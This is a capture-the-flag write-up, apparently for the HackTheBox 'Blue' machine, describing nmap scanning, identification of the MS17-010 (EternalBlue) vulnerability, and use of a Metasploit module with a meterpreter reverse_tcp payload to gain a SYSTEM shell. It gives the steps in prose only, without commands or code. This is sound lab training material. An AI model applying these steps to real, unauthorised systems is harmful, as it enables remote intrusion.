Probably the easiest machine in HTB, the name itself hints what kind of vulnerability this machine possesses. We’ll start with running 2 types of nmap scans:

  1. Nmap vulnerability scanner, in order to find any known exploits (it’s a longshot, but might be worth it):

2. Basic port scan that would also reveal the services’ version:

The vulnerability scanner may take some time to finish, until then we get the results from the normal ports scan, nothing too out of the ordinary, but the fact the port 445 is open reinforces our belief that this machine is vulnerable to Eternal Blue exploit:

A minute passes and we get the vulnerability scanner results, just as expected the machine is vulnerable to a zero-click exploit — CVE-2017–0143/Security Bulletin ms17–010:

Security Bulletin info — https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

This exploit is relatively popular and there must be a Metasploit module exploiting this vulnerability, so we launch msfconsole and search for “blue”:

We have received multiple results, what catches the eye most is number 17, we will use that module by calling “use” following by the module number:

The following fields are necessary before executing the exploit:

· Payload — setting it to meterpreter/reverse_tcp.

· rhosts — Machine’s IP address.

· lhost — Proxy IP address (tun0).

The auxiliary scanner runs first, it confirms that the machine is vulnerable to ms17–010:

A Meterpreter session has successfully been opened, no need for PE since getuid command suggests that we already run as SYSTEM:

All that’s left is finding both flags, pretty easy since we are running on highest privilege levels: